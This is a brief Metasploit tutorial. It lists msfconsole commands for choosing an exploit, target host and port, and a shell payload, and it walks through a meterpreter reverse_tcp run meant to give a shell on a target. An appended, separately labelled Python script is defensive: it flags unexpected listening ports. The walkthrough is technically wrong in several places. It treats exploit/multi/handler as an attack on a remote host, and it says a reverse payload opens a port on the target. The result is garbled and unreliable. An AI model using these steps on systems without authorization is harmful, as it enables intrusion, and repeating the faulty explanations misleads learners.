Metasploit is the most advanced and popular framework that can be used
for pen-testing.
Metasploit is a hacking framework written in Ruby. It is designed to
help make writing and executing exploits as simple as possible.
Running Metasploit:
Metasploit should already be installed on the machine that you're
using (I am using Kali Linux), so to start the console, simply run msfconsole.
To run msfconsole, open a terminal and give the command:
msfconsole
Before executing your exploit, it is useful to understand what some
Metasploit commands do.
Here is a list of some of the commands that you will use most:
use exploitname
Tells Metasploit to use the exploit with a specified name.
set RHOST hostname_or_ip
Will instruct Metasploit to target the specified remote host.
set RPORT host_port
Sets the port that Metasploit will connect to on the remote host.
set PAYLOAD generic/shell_bind_tcp
Sets the payload that is used to a generic payload that will give you a shell when a
service is exploited.
set LPORT local_port
Sets the port number that the payload will open on the server when a service
is exploited. It is important that this port number be a port that can be opened
on the server (i.e. it is not in use by another service and not reserved for
administrative use).
exploit
Actually exploits the service. Another version of exploit, rexploit, reloads your
exploit code and then executes the exploit. This allows you to try minor changes to
your exploit code without restarting the console.
show options
Will show you the options that you have set and possibly ones that you might have forgotten
to set. Each exploit and payload comes with its own options that you can set. show
exploits and show payloads can also be used to show all exploits and payloads that are
built into Metasploit.
OK, now I will show you how to use those commands.
set PAYLOAD windows/meterpreter/reverse_tcp
set LPORT 1337
use exploit/multi/handler
set RHOST 198.168.2.3
set RPORT 1337
exploit
The commands use the exploit/multi/handler exploit to
attack 198.168.2.3 on port 1337 with the
windows/meterpreter/reverse_tcp payload. When it is successful, it will
open port 1337 on the target machine and Metasploit will show you a
shell.
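From the defender's side, the port that a bind payload such as generic/shell_bind_tcp opens on LPORT shows up as a new listening TCP socket on the target. The following is an added example, not code from the original post: it compares `ss -ltnpH` output from a Linux host with a baseline of expected ports. The sample output, the baseline and the function names are constructed for illustration.

```python
import ipaddress

# Constructed sample of `ss -ltnpH` output (not captured from a real host).
SAMPLE_SS = """\
LISTEN 0 128 0.0.0.0:22 0.0.0.0:* users:(("sshd",pid=811,fd=3))
LISTEN 0 511 0.0.0.0:443 0.0.0.0:* users:(("nginx",pid=902,fd=6))
LISTEN 0 1 0.0.0.0:1337 0.0.0.0:* users:(("sh",pid=4242,fd=3))
LISTEN 0 128 127.0.0.1:5432 0.0.0.0:* users:(("postgres",pid=733,fd=5))
LISTEN 0 128 127.0.0.1:6010 0.0.0.0:* users:(("sshd",pid=1290,fd=9))
LISTEN 0 128 [::]:22 [::]:* users:(("sshd",pid=811,fd=4))
"""

# Assumed baseline of ports this host is expected to listen on.
BASELINE_PORTS = {22, 443, 5432}

def parse_listeners(ss_output):
    """Return (address, port, process) for each LISTEN row."""
    rows = []
    for line in ss_output.splitlines():
        fields = line.split()
        if len(fields) < 5 or fields[0] != "LISTEN":
            continue
        # rpartition keeps IPv6 literals such as [::]:22 intact.
        addr, _, port = fields[3].rpartition(":")
        if not port.isdigit():
            continue
        addr = addr.split("%")[0].strip("[]")  # drop scope id and brackets
        process = fields[5] if len(fields) > 5 else ""
        rows.append((addr, int(port), process))
    return rows

def is_loopback(addr):
    try:
        return ipaddress.ip_address(addr).is_loopback
    except ValueError:
        return False  # "*" (all interfaces) or unparsable: treat as reachable

def unexpected_listeners(ss_output, baseline):
    """Listening ports outside the baseline, with whether they are reachable remotely."""
    findings = [
        {"port": port, "address": addr, "process": process,
         "remote_reachable": not is_loopback(addr)}
        for addr, port, process in parse_listeners(ss_output)
        if port not in baseline
    ]
    return sorted(findings, key=lambda f: (f["port"], f["address"]))

if __name__ == "__main__":
    for finding in unexpected_listeners(SAMPLE_SS, BASELINE_PORTS):
        print(finding)
```

A listener that is both outside the baseline and bound to a non-loopback address is the case to investigate first, since a loopback-only socket cannot accept a connection from another machine.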